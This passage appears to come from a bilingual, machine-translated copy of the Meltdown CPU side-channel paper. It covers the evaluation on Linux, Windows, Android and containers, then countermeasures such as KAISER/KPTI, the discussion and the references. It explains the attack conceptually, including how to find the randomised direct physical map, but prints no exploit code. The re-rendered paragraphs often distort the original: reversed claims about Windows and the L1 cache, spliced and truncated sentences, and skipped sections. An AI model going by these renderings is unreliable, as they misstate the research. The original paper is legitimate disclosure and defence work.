We successfully evaluated Meltdown on multiple versions of the Linux kernel, from 2.6.32 to 4.13.0. On all these versions of the Linux kernel, the kernel address space is also mapped into the user address space. Thus, all kernel addresses are also mapped into the address space of user space applications, but any access is prevented due to the permission settings for these addresses. As Meltdown bypasses these permission settings, an attacker can leak the complete kernel memory if the virtual address of the kernel base is known. Since all major operating systems also map the entire physical memory into the kernel address space (cf. Section 2.2), all physical memory can also be read.
We successfully evaluated Meltdown against several versions of the Linux kernel (from 2.6.32 to 4.13.0). In all these versions of the Linux kernel, the kernel address space is mapped into the user process address space. But any kernel data access from user space is blocked due to permission settings. Meltdown can bypass these permission settings, and as long as the attacker knows the kernel virtual address, he can launch an attack to leak kernel data. Since all major operating systems map the entire physical memory into the kernel address space (see Section 2.2), exploiting the meltdown vulnerability can read data from all physical memory.
Before kernel 4.12, kernel address space layout randomization (KASLR) was not active by default [30]. If KASLR is active, Meltdown can still be used to find the kernel by searching through the address space (cf. Section 5.2). An attacker can also simply de-randomize the direct-physical map by iterating through the virtual address space. Without KASLR, the direct-physical map starts at address 0xffff 8800 0000 0000 and linearly maps the entire physical memory. On such systems, an attacker can use Meltdown to dump the entire physical memory, simply by reading from virtual addresses starting at 0xffff 8800 0000 0000.
在4.12内核之前,内核地址空间布局随机化(KASLR)不是默认启用的[ 30 ]。如果启动KASLR这个特性,meltdown仍然可以用来找到内核的映射位置(这是通过搜索地址空间的方法,具体参见5.2节)。攻击者也可以通过遍历虚拟地址空间的方法来找到物理内存直接映射的信息。没有KASLR,Linux内核会在0xffff 8800 0000 0000开始的线性地址区域内映射整个物理内存。在这样的系统中,攻击者可以用meltdown轻松dump整个物理内存,因为攻击者已经清楚的知道物理内存的虚拟地址是从0xffff 8800 0000 0000开始的。
On newer systems, where KASLR is active by default, the randomization of the direct-physical map is limited to 40 bit. It is even further limited due to the linearity of the mapping. Assuming that the target system has at least 8GB of physical memory, the attacker can test addresses in steps of 8 GB, resulting in a maximum of 128 memory locations to test. Starting from one discovered location, the attacker can again dump the entire physical memory.
In the new linux system, KASLR is started by default, so the virtual address of physical memory does not start from 0xffff 8800 0000 0000, but needs to accumulate a 40-bit random offset. Since the mapping of physical memory is linear, the effect of KASLR in preventing meltdown attacks is further limited. Assuming that the target system has 8GB of memory, the attacker can crack the 40-bit random offset in steps of 8 GB, and the random offset can be deciphered in a maximum of 128 attempts. Once the random offset value is compromised, the attacker can dump the entire physical memory again. Hence, for the evaluation, we can assume that the randomization is either disabled, or
the offset was already retrieved in a pre-computation step.
The displacement is already precomputed.

6.1.2 Linux with KAISER patch (Linux with KAISER patch)

The KAISER patch by Gruss et al. [8] implements a stronger isolation between kernel and user space.
KAISER does not map any kernel memory in the user space, except for some parts required by the x86 architecture (eg, interrupt handlers). Thus , there is no valid mapping to either kernel memory or physical memory (via the direct-physical map) in the user space, and such addresses can therefore not be resolved. Consequently, Meltdown cannot leak any kernel or physical memory except for the few memory locations which have to be mapped in user space.
The KAISER patch [8] released by Gruss achieves stronger isolation between kernel and user space. KAISER does not map the kernel address space into the user process space at all. Except for some parts of the code required by the x86 architecture (such as interrupt handlers), there is no direct mapping of physical memory in user space, nor any information about the kernel address space. There is no valid mapping, so userspace cannot resolve these addresses at all. Therefore, meltdown cannot leak any data except for a few physical memory or kernel addresses that must be mapped in user space.
We verified that KAISER indeed prevents Meltdown, and there is no leakage of any kernel or physical memory
.
Furthermore, if KASLR is active, and the few remaining memory locations are randomized, finding these memory locations is not trivial due to their small size of several kilobytes. Section 7.2 discusses the implications of these mapped memory locations from a security perspective. In addition,
if With KASLR enabled, although some kernel address space mappings are visible in user mode, the locations of these kernel addresses are random, and since this memory area is only a few KB, it is not a simple matter to find these memory locations. Section 7.2 discusses the implications of mapping this small piece of memory from a security perspective.

6.1.3Microsoft Windows

We successfully evaluated Meltdown on a recent Microsoft Windows 10 operating system, last updated just before patches against Meltdown were rolled out. In line with the results on Linux (cf. Section 6.1.1), Meltdown also can leak arbitrary kernel memory on Windows. This is not surprising, since Meltdown does not exploit any software issues, but is caused by a hardware issue.
We have successfully evaluated Meltdown on the latest Microsoft Windows 10 operating system prior to the rollout of a patch for Meltdown the latest update. Consistent with the results on Linux (see Section 6.1.1), Meltdown also leaks arbitrary kernel memory on Windows. This is not surprising since Meltdown does not take advantage of any software issues, but is caused by hardware issues.
In contrast to Linux, Windows does not have the concept of an identity mapping, which linearly maps the physical memory into the virtual address space. Instead, a large fraction of the physical memory is mapped in the paged pools, non-paged pools, and the system cache. Furthermore, Windows maps the kernel into the address space of every application too. Thus, Meltdown can read kernel memory which is mapped in the kernel address space, ie, any part of the kernel which is not swapped out, and any page mapped in the paged and non-paged pool, and the system cache.
Compared to Linux, Windows has no disadvantages other than identity mapping, which linearly maps physical memory to virtual address space. Instead, a large portion of physical memory is mapped into paged pool, nonpaged pool, and system cache. Additionally, Windows also maps the kernel into each application's address space. Thus, Meltdown can read kernel memory mapped in the kernel address space, i.e. any part of the kernel that is not swapped out, and any pages mapped in the paged and nonpaged pool, as well as the system cache.
Note that there are physical pages which are mapped in one process but not in the (kernel) address space of another process, ie, physical pages which cannot be attacked using Meltdown. However, most of the physical memory will still be accessible through Meltdown.
Note that there are some physical pages that are mapped in one process but not in another process's (kernel) address space, i.e. physical pages that cannot be located using Meltdown. However, most physical memory is still accessible through Meltdown.
We were successfully able to read the binary of the Windows kernel using Meltdown. To verify that the leaked data is actual kernel memory, we first used the Windows kernel debugger to obtain kernel addresses containing actual data. After leaking the data, we again used the Windows kernel debugger to compare the leaked data with the actual memory content, confirming that Meltdown can successfully leak kernel memory.
We were able to successfully read Windows kernel binaries using Meltdown. To verify that the leaked data is actual kernel memory, we first use the Windows kernel debugger to obtain the kernel address containing the actual data. After leaking the data, we again used the Windows kernel debugger to compare the leaked data with the actual memory content, confirming that Meltdown can successfully leak kernel memory.

6.1.4Android

We successfully evaluated Meltdown on a Samsung Galaxy S7 mohile phone running LineageOS Android 14.1 with a Linux kernel 3.18.14. The device is equipped with a Samsung Exynos 8 Octa 8890 SoC consisting of a ARM Cortex-A53 CPU with 4 cores as well as an Exynos M1 ”Mongoose” CPU with 4 cores [6]. While we were not able to mount the attack on the CortexA53 CPU, we successfully mounted Meltdown on Samsung’s custom cores. Using exception suppression described in Section 4.1, we successfully leaked a predefined string using the direct-physical map located at the virtual address 0xffff ffbf c000 0000.
We successfully evaluated Meltdown on a Samsung Galaxy S7 Mohile phone running LineageOS Android 14.1 and Linux kernel 3.18.14. The device is equipped with a Samsung Exynos 8 Octa 8890 SoC consisting of an ARM Cortex-A53 CPU with 4 cores and an Exynos M1 "Mongoose" CPU with 4 cores [6]. Although we were unable to launch the attack on the Cortex A53 CPU, we managed to install Meltdown on Samsung's custom kernel. Using the exception suppression described in Section 4.1, we successfully leaked a predefined string using a direct physical mapping located at virtual address 0xffff ffbf c000 0000.

6.1.5 Containers

We evaluated Meltdown running in containers sharing a kernel, including Docker, LXC, and OpenVZ, and found that the attack can be mounted without any restrictions. Running Meltdown inside a container allows to leak information not only from the underlying kernel, but also from all other containers running on the same physical host.
We evaluated meltdown in a container environment (sharing a kernel), including Docker, LXC, and OpenVZ, and found that meltdown can launch attacks without any restrictions. Running a meltdown attack in a container can not only leak the underlying kernel information, but also leak information on other containers on the same physical host.
The commonality of most container solutions is that every container uses the same kernel, ie, the kernel is shared among all containers. Thus, every container has a valid mapping of the entire physical memory through the direct-physical map of the shared kernel. Furthermore , Meltdown cannot be blocked in containers, as it uses only memory accesses. Especially with Intel TSX, only unprivileged instructions are executed without even trapping into the kernel. Most container solutions use the
same kernel, that is, the kernel is in all containers shared among. Therefore, each container has a direct mapping to the entire physical memory. Since only memory access is involved, meltdown attacks cannot be prevented in containers. Especially in the case of using the Intel TSX feature, the attack does not need to trap kernel execution at all, only the execution of unprivileged instructions.
Thus, the isolation of containers sharing a kernel can be fully broken using Meltdown. This is especially critical for cheaper hosting providers where users are not separated through fully virtualized machines, but only through containers. We verified that our attack works in such a setup, by successfully leaking memory contents from a container of a different user under our control.
Therefore, container isolation of a shared kernel can be easily broken by meltdown. The problem is exacerbated by providers of cheap colocation services, where users are not isolated by fully virtualized physical machines, but only by containers. We verified that meltdown does work in such an environment, and we can successfully steal memory information from other user containers.

6.1.6 Uncached and Uncacheable Memory (Uncached and Uncacheable Memory)

In this section, we evaluate whether it is a requirement for data to be leaked by Meltdown to reside in the L1 data cache [33]. Therefore, we constructed a setup with two processes pinned to different physical cores. By flushing the value, using the clflush instruction, and only reloading it on the other core, we create a situation where the target data is not in the L1 data cache of the attacker core. As described in Section 6.2, we can still leak the data at a lower reading rate. This clearly shows that data presence in the attacker’s L1 data cache is not a requirement for Meltdown. Furthermore, this observation has also been confirmed by other researchers [7, 35, 5].
In this section, we evaluate whether Meltdown leaked data needs to be kept in the L1 data cache [33]. Therefore, we built a setup that pins the two processes to different physical cores. By flushing the value with the clflush instruction, and only reloading it on another core, we create a situation where the target data is not in the L1 data cache of the attacker core. As described in Section 6.2, we can still leak data at lower read rates. This clearly shows that the attacker has no data in their L1 data cache, which is not a requirement for Meltdown. Furthermore, this observation was confirmed by other researchers [7, 35, 5].
The reason why Meltdown can leak uncached memory may be that Meltdown implicitly caches the data. We devise a second experiment, where we mark pages as uncacheable and try to leak data from them. This has the consequence that every read or write operation to one of those pages will directly go to the main memory, thus, bypassing the cache. In practice, only a negligible amount of system memory is marked uncacheable. We observed that if the attacker is able to trigger a legitimate load of the target address, e.g., by issuing a system call (regular or in speculative execution [40]), on the same CPU core as the Meltdown attack, the attacker can leak the content of the uncacheable pages. We suspect that Meltdown reads the value from the line fill buffers. As the fill buffers are shared between threads running on the same core, the read to the same address within the Meltdown attack could be served from one of the fill buffers allowing the attack to succeed. However, we leave further investigations on this matter open for future work.
The reason why Meltdown may leak uncached memory may be that Meltdown implicitly caches data. We devised a second experiment where we marked pages as non-cacheable and attempted to leak data from them. The result is that every read or write to one of those pages goes directly to main memory, bypassing the cache. In fact, only a negligible amount of system memory is marked as non-cacheable. We observe that an attacker can leak non-cacheable pages if they are able to trigger a legitimate load of the target address (e.g., by issuing a system call (regular or speculative execution [40]) on the same CPU core as the Meltdown attack . We suspect that Meltdown reads the value from the line fill buffer. If the fill buffer is shared between threads running on the same core, the same address read into Melt could be provided from one of the fill buffers down A similar observation on uncacheable memory was also made with Specter attacks
on the System Management Mode [10]. While the attack works on memory set uncacheable over Memory-Type Range Registers, it does not work on memory-mapped I/O regions, which is the expected behavior as accesses to memory-mapped I/O can always have architectural effects. Through the Specter
attack on System Manage, there are also non-cacheable memory Observations similar to the pattern [10]. While the attack targets memory sets that cannot be cached via "memory-type range registers", it does not work for memory-mapped I/O regions, which is the expected behavior because accessing memory-mapped I/O O always has architectural implications.

6.2meltdown performance

To evaluate the performance of Meltdown, we leaked known values ​​from kernel memory. This allows us to not only determine how fast an attacker can leak memory, but also the error rate, ie, how many byte errors to expect. We achieved average reading rates of up to 503KB/s with an error rate as low as 0.02% when using exception suppression. For the performance evaluation, we focused on the Intel Core i7-6700K as it supports Intel TSX, to get a fair performance comparison between exception handling and exception suppression.
In order to evaluate the performance of meltdown, we set the specified value in the kernel memory to be attacked in advance. This allowed us to determine not only how fast the attacker was stealing data from memory, but also the error rate (ie how many bytes were wrong). With exception suppression (requires TSX support), we achieve a data leak rate of 503kB/s with an error rate below 0.02%. For performance evaluation, we focused on Intel's Core i7-6700k processor because it supports TSX. In this way, we can compare the performance of meltdown under exception handling and exception suppression in a fair environment (same CPU).
For all tests, we use Flush+Reload as a covert channel to leak the memory as described in Section 5. We evaluated the performance of both exception handling and exception suppression (cf. Section 4.1). For exception handling, we used signal handlers, and if the CPU supported it, we also used exception suppression using Intel TSX. An extensive evaluation of exception suppression using conditional branches was done by Kocher et al. [19] and is thus omitted in this paper for the sake of brevity. For
all For the test, we use Flush+Reload as a covert channel to leak memory information. For details, please refer to the description in Chapter 5. We evaluate the performance of meltdown under two methods of exception handling and exception suppression (see Section 4.1). For exception handling, we set the signal handler function. If the CPU supports it, we can also use Intel TSX to complete exception suppression. The evaluation of exception suppression using conditional branches was done by Kocher et al. [19]. For the sake of brevity, this part is omitted in this article.
(1) Exception handling
Exception handling is the more universal implementation, as it does not depend on any CPU extension and can thus be used without any restrictions. The only requirement for exception handling is operating system support to catch segmentation faults and continue operation afterwards. This is the c ase for all modern operating systems, even though the specific implementation differs between the operating systems. On Linux, we used signals, whereas, on Windows, we relied on the Structured Exception Handler. The method of exception handling is more general, because it does not depend on
any CPU extension features, which can be used on various processors without any restrictions. The only requirement for exception handling is that the operating system supports catching a segmentation fault and continuing operation. Basically all modern operating systems support this feature, although the specific implementation will vary. On Linux we use signals, while on Windows we rely on Structured Exception Handlers.
With exception handling, we achieved average reading speeds of 123KB/s when leaking 12MB of kernel memory. Out of the 12MB kernel data, only 0.03%were read incorrectly. Thus, with an error rate of 0.03 %, the channel capacity is 122KB/s.
在使用异常处理的情况下,我们实现了以123kB / s的平均速度完成了12MB内核数据的泄漏。在12MB的内核数据中,错误率只有0.03%。因此信道容量是122kB/s。
(2)异常抑制
和Intel处理器相关,忽略之。
3、Meltdown实战
这个小节展示了几个具体的meltdown攻击效果,忽略之。

6.3AMD和ARM处理器上的限制

We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD. The reasons for this can be manifold. First of all, our implementation might simply be too slow and a more optimized version might succeed. For instance, a more shallow out-of-order execution pipeline could tip the race condition towards against the data leakage. Similarly, if the processor lacks certain features, e.g., no re-order buffer, our current implementation might not be able to leak data. However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed.
We also attempted to reproduce the meltdown vulnerability on several ARM and AMD CPUs. However, we have not successfully used the attack method described in Chapter 5 to steal kernel memory on either ARM or AMD processors. There are many reasons for this situation. First, our implementation might be too slow, a more optimized version might do the trick. For example, a shallower out-of-order execution pipeline might make data leaks a little harder. Similarly, if the processor lacks certain features, such as no re-order buffer (re-order buffer), then our current code implementation may not be able to leak data. However, the simple example described in Chapter 3 still works reliably for ARM and AMD processors, suggesting that out-of-order execution also occurs on those CPUs, that is, instructions following the instruction that violates the memory access are also prematurely executed. implement.

7. Countermeasures

In this section, we discuss countermeasures against the Meltdown attack. At first, as the issue is rooted in the hardware itself, we want to discuss possible microcode updates and general changes in the hardware design. Second, we want to discuss the KAISER countermeas ure that has been developed to mitigate side-channel attacks against KASLR which inadvertently also protects against Meltdown.
In this chapter, we discuss how to deal with meltdown attacks. Since this issue itself originates from the hardware design, we first discuss how to fix this vulnerability by updating the hardware design. Second, we discuss how to mitigate meltdown with KAISER, although KAISER was originally designed to prevent KASLR side-channel attacks.

7.2 Hardware strategy (Hardware)

Meltdown bypasses the hardware-enforced isolation of security domains. There is no software vulnerability involved in Meltdown. Hence any software patch (eg, KAISER [8]) will leave small amounts of memory exposed (cf. Section 7.2). There is no documentation whether such a fix requires the development of completely new hardware, or can be fixed using a microcode update.
Meltdown does not involve software vulnerabilities, it directly bypasses the hardware isolation mechanism. Therefore, any software patch (e.g., KAISER [8]) will expose a small number of memory regions (see Section 7.2). Whether you need to develop entirely new hardware or use a microcode update to fix meltdown, there is no documentation for that.
As Meltdown exploits out-of-order execution, a trivial countermeasure would be to completely disable out-of-order execution. However, the performance impacts would be devastating, as the parallelism of modern CPUs could not be leveraged anymore. Thus, this is not a viable solution.
Since meltdown exploits out-of-order execution, a simple countermeasure is to disable out-of-order execution entirely. The performance impact of this would be devastating though, as we would no longer be able to take advantage of the parallelism of modern CPUs. Therefore, this solution is not feasible.
Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address. Serializing the permission check and the register fetch can prevent Meltdown, as the memory address is never fetched if the permission check fails s.However, This involves a significant overhead to every memory fetch, as the memory fetch has to stall until the permission check is completed.
Meltdown is a race condition between "getting memory address data" and "permission check". Strictly performing a permission check before obtaining address data can prevent meltdown, that is, when the permission check cannot pass, the CPU has no way to load the protected memory data into the register. However, this adds significant overhead to each memory access, since memory accesses can only be stalled until permission checks are complete.
A more realistic solution would be to introduce a hard split of user space and kernel space. This could be enabled optionally by modern kernels using a new hard split bit in a CPU control register, e.g., CR4. If the hard split bit is set, the kernel has to reside in the upper half of the address space, and the user space has to reside in the lower half of the address space. With this hard split, a memory fetch can immediately identify whether such a fetch of the destination would violate a security boundary, as the privilege level can be directly derived from the virtual address without any further lookups. We expect the performance impacts of such a solution to be minimal. Furthermore, the backwards compatibility is ensured, since the hard-split bit is not set by default and the kernel only sets it if it supports the hard-split feature.
A more realistic solution is to separate user space and kernel space at the hardware level. This can be enabled by a bit (called hard-split bit) in a CPU register (eg cr4). If this bit is set to 1, kernel addresses must be in the upper half of the address space, and user space must be in the lower half of the address space. With this hardware mechanism, privilege-violating memory reads can be identified immediately, because the required privilege level can be deduced directly from the virtual address without any further lookup. We believe this solution has minimal impact on performance. Also, backwards compatibility is guaranteed, because by default we don't set the hard-split bit, and the kernel only sets it when the hardware supports it.
Note that these countermeasures only prevent Meltdown, and not the class of Specter attacks described by Kocher et al. [19]. Likewise, several countermeasures presented by Kocher et al. [19] have no effect on Meltdown. We stress that it is important to deploy countermeasures against both attacks.
Note that these countermeasures only prevent meltdown and are ineffective against the Specter attack found by Kocher et al. [19]. Likewise, the countermeasure proposed by Kocher et al. to address the spectre vulnerability [19] has no effect on meltdown. We emphasize here again: it is very important to deploy related countermeasures against these two attacks.

7.2 CAISER

As hardware is not as easy to patch, there is a need for software workarounds until new hardware can be deployed. Gruss et al. [8] proposed KAISER, a kernel modification to not have the kernel mapped in the user space. This modification was intended to prevent side-channel attacks breaking KASLR [13, 9, 17]. However, it also prevents Meltdown, as it ensures that there is no valid mapping to kernel space or physical memory available in user space. KAISER will be available in the upcoming releases of the Linux kernel under the name kernel page-table isolation (KPTI) [25]. The patch will also be backported to older Linux kernel versions. A similar patch was also introduced in Microsoft Windows 10 Build 17035 [15]. Also, Mac OS X and iOS have similar features [22].
硬件修复漏洞没有那么快,因此我们还是要到在新的硬件可以部署之前,提供软件绕过的方案。Gruss等人[ 8 ]建议了KAISER方案,该方案对内核进行修改,以便在用户进程地址空间中根本看不到内核地址的映射。这个补丁是为了防止侧信道攻击方法攻破KASLR [ 13, 9, 17 ]。然而,因为它确保了在用户空间没有有效的内核空间映射或物理内存映射,因此KAISER也能解决meltdown问题。KAISER将会出现在即将发布的Linux内核中,名字改成了KPTI(kernel page-table isolation)[ 25 ],同时该补丁也将移植到旧的Linux内核版本。微软Windows 10也提供了类似的补丁[ 15 ]。另外,Mac OS X和iOS也有类似的功能[ 22 ]。
Although KAISER provides basic protection against Meltdown, it still has some limitations. Due to the design of the x86 architecture, several privileged memory locations are required to be mapped in user space [8]. This leaves a residual attack surface for Meltdown, ie, These memory locations can still be read from user space. Even though these memory locations do not contain any secrets, such as credentials, they might still contain pointers. Leaking one pointer can be enough to again break KASLR, as the randomization can be calc regulated from the pointer value.
Although KAISER provides basic protection against meltdown, it still has some limitations. Due to the design of the x86 architecture, a small section of kernel address space [8] needs to be mapped in user space, so these memory locations can still be read from user space, which leaves a foreshadowing for meltdown attacks. Even though these memory locations do not contain any confidential data, they may still contain pointers. In fact, the data of a pointer is enough to break through KASLR, because the random offset can be derived from the value of the pointer.
Still, KAISER is the best short-time solution currently available and should therefore be deployed on all systems immediately. Even with Meltdown, KAISER can avoid having any kernel pointers on memory locations that are mapped in the user space which would leak information about the randomized offsets. This would require trampoline locations for every kernel pointer, i.e., the interrupt handler would not call into kernel code directly, but through a trampoline function. The trampoline function must only be mapped in the kernel. It must be randomized with a different offset than the remaining kernel. Consequently, an attacker can only leak pointers to the trampoline code, but not the randomized offsets of the remaining kernel. Such trampoline code is required for every kernel memory that still has to be mapped in user space and contains kernel addresses. This approach is a trade-off between performance and security which has to be assessed in future work.
Still, KAISER is the best short-term solution right now and should be deployed on all systems immediately. Even if there is a meltdown vulnerability in the CPU, the KAISER patch avoids saving the pointer of the kernel in the memory location mapped by the user space, so as to avoid leaking random offset information. In order to achieve this goal, we need to establish trampoline code for each kernel pointer, for example: the interrupt handler will not directly call the kernel code, but through the trampoline function. The trampoline function will only be mapped into kernel space, but should be at a different random offset from the rest of the kernel. Therefore, an attacker can only obtain the kernel address of the trampoline code, but cannot crack the random offset of the remaining kernel. Each process address space still maps the memory of the trampoline code, and this memory also includes the address of the kernel, which has certain risks, but this method is a balance between performance and security, and it is also what we must do in the future The subject of further research on the work.

8. Discussion

Meltdown fundamentally changes our perspective on the security of hardware optimizations that manipulate the state of microarchitectural elements. The fact that hardware optimizations can change the state of microarchitectural elements, and thereby imperil secure soft-ware implementations, is known since more than 20 years [20]. Both industry and the scientific community so far accepted this as a necessary evil for efficient computing. Today it is considered a bug when a cryptographic algorithm is not protected against the microarchitectural leakage introduced by the hardware optimizations. Meltdown changes the situation entirely. Meltdown shifts the granularity from a comparably low spatial and temporal granularity, e.g., 64-bytes every few hundred cycles for cache attacks, to an arbitrary granularity, allowing an attacker to read every single bit. This is nothing any (cryptographic) algorithm can protect itself against. KAISER is a short-term software fix, but the problem we uncovered is much more significant.
By adjusting the state of the CPU microarchitecture, CPU designers can optimize the performance of the hardware, but the security issues introduced by this have not attracted enough attention. Meltdown has fundamentally changed this point, that is, CPU designers must face security issues directly. For more than 20 years, CPU designers have been well aware of the fact that hardware optimizations can change the state of the CPU microarchitecture, thereby bringing risks to the implementation of secure software [20]. But so far, industry and science have agreed that this is a problem that is necessary for efficient computing, and you have to accept it. Now, when a cryptographic algorithm fails to protect against microarchitectural state leaks (introduced due to hardware optimizations), we consider it a software bug. Meltdown completely changed the status quo. The original attack is relatively small in space and time granularity, for example, the space granularity of cache attack is 64 bytes, and the time granularity is about hundreds of cycles. With meltdown, the granularity of space and time can be specified arbitrarily, allowing an attacker to read every bit, which is not what (encryption) algorithms can protect. KAISER is a short-term software solution, but the issues we uncover are more important (i.e., security cannot be sacrificed for performance).
We expect several more performance optimizations in modern CPUs which affect the microarchitectural state in some way, not even necessarily through the cache. Thus, hardware which is designed to provide certain security guarantees, eg, CPUs running untrusted code , require a redesign to avoid Meltdown - and Spectre-like attacks. Meltdown also shows that even error-free software, which is explicitly written to thwart side-channel attacks, is not secure if the design of the underlying hardware is not taken into account. We expect more
performance Optimizations appear on modern CPUs, and these optimizations may affect the state of the microarchitecture in some way (not necessarily cache state, but other CPU microarchitectural units). However, as long as security is included in the design requirements of CPU hardware, CPU designers need to redesign to avoid meltdown and spectre attacks. Meltdown also shows that even software that is bug-free and carefully designed to avoid side-channel attacks is insecure without careful consideration of the security of the underlying hardware.
With the integration of KAISER into all major operating systems, an important step has already been done to prevent Meltdown. KAISER is also the first step of a paradigm change in operating systems. Instead of always mapping everything into the address space, mapping only the minimally required memory locations appears to be a first step in reducing the attack surface. However, it might not be enough, and an even stronger isolation may be required. In this case, we can trade flexibility for performance and security, by e.g., forcing a certain virtual memory layout for every operating system. As most modern operating system already use basically the same memory layout, this might be a promising approach.
With KAISER integrated into all current mainstream operating systems, we have taken an important step in preventing meltdown. KAISER also changed the design of address mapping in the operating system. It turns out that we always map all addresses (including the kernel and users) to the entire process address space. Now, we only map the necessary address space when executing in user mode. This is indeed reducing the attack range. However, this may not be enough and we may need stronger isolation. In this case, we need to balance performance and security, for example, by forcing each operating system to conform to a specific virtual memory layout. Since most modern operating systems use essentially the same memory layout, this could be a promising approach.
Meltdown also heavily affects cloud providers, especially if the guests are not fully virtualized. For performance reasons, many hosting or cloud providers do not have an abstraction layer for virtual memory. In such environments, which typically use containers, such as Docker or OpenVZ, the kernel is shared among all guests. Thus, the isolation between guests can simply be circumvented with Meltdown, fully exposing the data of all other guests on the same host. For these providers, changing their infrastructure to full virtualization or using software workarounds such as KAISER would both increase the costs significantly.
Meltdown also severely impacts cloud service providers, especially in scenarios where clients are not fully virtualized. For performance reasons, many cloud service providers do not have an abstraction layer for virtual memory. In such an environment (usually using containers such as Docker or OpenVZ), the kernel is shared among all guest os. Therefore, although there is isolation between guest os, we can use Meltdown to expose data of other guest os (on the same host). For these providers, changing their infrastructure, going fully virtualized or using software solutions such as KAISER will add cost.
Even if Meltdown is fixed, Specter [19] will remain an issue. Specter [19] and Meltdown need different defenses. Specifically mitigating only one of them will leave the security of the entire system at risk. We expect that Meltdown and Specter open a new field of research to investigate in what extent performance optimizations change the microarchitectural state, how this state can be translated into an architectural state, and how such attacks can be prevented.
Even if meltdown is fixed, spectre[19] is still a problem. Specter and meltdown require different defensive strategies. Just fixing one of them will not solve the security problem of the whole system. We expect meltdown and spectre to open up a new field of research to discuss issues related to CPU design, including how changing the state of the microarchitecture can optimize CPU performance, how the state of the microarchitecture translates into the state of the CPU architecture, and how to prevent this. s attack.

9. Conclusion

In this paper, we presented Meltdown, a novel softwarebased side-channel attack exploiting out-of-order execution on modern processors to read arbitrary kernel- and physical-memory locations from an unprivileged user space program. Without requiring any software vulnerability and independent of the operating system, Meltdown enables an adversary to read sensitive data of other processes or virtual machines in the cloud with up to 503KB/s, affecting millions of devices. We showed that the countermeasure KAISER [8], originally proposed to protect from side-channel attacks against KASLR, inadvertently impedes Meltdown as well. We stress that KAISER needs to be deployed on every operating system as a short-term workaround, until Meltdown is fixed in hardware, to prevent large-scale exploitation of Meltdown.
In this paper, we describe a new type of CPU vulnerability, meltdown, a method to read arbitrary kernel addresses and physical memory data through side-channel attacks by exploiting the out-of-order execution characteristic on modern processors. There is no need to exploit software vulnerabilities, and it has nothing to do with the specific operating system. Using the Meltdown vulnerability, ordinary user space programs can read sensitive data of other processes or virtual machines at a speed of 503KB/s, which affects millions of devices. We found that the countermeasure against meltdown is KAISER [8], which was originally introduced to prevent side-channel attacks on KASLR, but inadvertently also prevents meltdown vulnerabilities. We recommend: A short-term solution is to deploy KAISER on every operating system until hardware that solves the meltdown issue appears.

thank you

We would like to thank Anders Fogh for fruitful discussions at BlackHat USA 2016 and BlackHat Europe 2016, which ultimately led to the discovery of Meltdown. Fogh [5] already suspected that it might be possible to abuse speculative execution in order to read kernel memory in user mode but his experiments were not successful. We would also like to thank Jann Horn for comments on an early draft. Jann disclosed the issue to Intel in June. The subsequent activity around the KAISER patch was the reason we started investigating this issue. Furthermore, we would like Intel, ARM, Qualcomm, and Microsoft for feedback on an early draft.
We thank Anders Fogh at BlackHat USA 2016 and BlackHat Europe 2016 for fruitful discussions that culminated in the discovery of meltdown. Anders Fogh [5] already suspected that it was possible to read kernel data in user mode using speculative execution, but his experiments were not successful. We would also like to thank Jann Horn for his comments on early drafts. Jann Horn disclosed the problem to Intel in June. Subsequent follow-up activity around the KAISER patch also led us to investigate this issue. In addition, we also appreciate the feedback given by Intel, ARM, Qualcomm, and Microsoft in the early draft stages.
We would also like to thank Intel for awarding us with a bug bounty for the responsible disclosure process, and their professional handling of this issue through communicating a clear timeline and connecting all involved researchers. Furthermore, we would also thank ARM for their fast response upon Disclosing the issue.
We would also like to thank Intel for rewarding us after discovering the meltdown vulnerability, and for disclosing the whole process responsibly, for their professional handling of this issue (give a clear timetable for full communication, and All relevant researchers were contacted). Additionally, we appreciate ARM's quick response when disclosing the issue.
This work was supported in part by the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681402).
欧洲研究委员会(ERC)根据欧盟Horizon 2020科研创新计划(编号:681402)对本项工作有一定的支持。

参考文献:

[1] BENGER, N., VAN DE POL, J., SMART, N. P., AND YAROM, Y. “Ooh Aah… Just a Little Bit”: A small amount of side channel can go a long way. In CHES’14 (2014).
[2] CHENG, C.-C. The schemes and performances of dynamic branch predictors. Berkeley Wireless Research Center, Tech. Rep (2000).
[3] DEVIES, A. M. AMD Takes Computing to a New Horizon with RyzenTMProcessors, 2016.
[4] EDGE, J. Kernel address space layout randomization, 2013.
[5] FOGH, A. Negative Result: Reading Kernel Memory From User Mode, 2017.
[6] GRAS, B., RAZAVI, K., BOSMAN, E., BOS, H., AND GIUFFRIDA, C. ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS (2017).
[7] GRUSS, D., LETTNER, J., SCHUSTER, F., OHRIMENKO, O., HALLER, I., AND COSTA, M. Strong and Efficient Cache Side-Channel Protection using Hardware Transactional Memory. In USENIX Security Symposium (2017).
[8] GRUSS, D., LIPP, M., SCHWARZ, M., FELLNER, R., MAURICE, C., AND MANGARD, S. KASLR is Dead: Long Live KASLR. In International Symposium on Engineering Secure Software and Systems (2017), Springer, pp. 161–176.
[9] GRUSS, D., MAURICE, C., FOGH, A., LIPP, M., AND MANGARD, S. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. In CCS (2016).
[10] GRUSS, D., MAURICE, C., WAGNER, K., AND MANGARD, S. Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA (2016).
[11] GRUSS, D., SPREITZER, R., AND MANGARD, S. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security Symposium (2015).
[12] HENNESSY, J. L., AND PATTERSON, D. A. Computer architecture: a quantitative approach. Elsevier, 2011.
[13] HUND, R., WILLEMS, C., AND HOLZ, T. Practical Timing Side Channel Attacks against Kernel Space ASLR. In S&P (2013).
[14] INTEL. IntelR 64 and IA-32 Architectures Optimization Reference Manual, 2014.
[15] IONESCU, A. Windows 17035 Kernel ASLR/VA Isolation In Practice (like Linux KAISER)., 2017.
[16] IRAZOQUI, G., INCI, M. S., EISENBARTH, T., AND SUNAR, B. Wait a minute! A fast, Cross-VM attack on AES. In RAID’14 (2014).
[17] JANG, Y., LEE, S., AND KIM, T. Breaking Kernel Address Space Layout Randomization with Intel TSX. In CCS (2016).
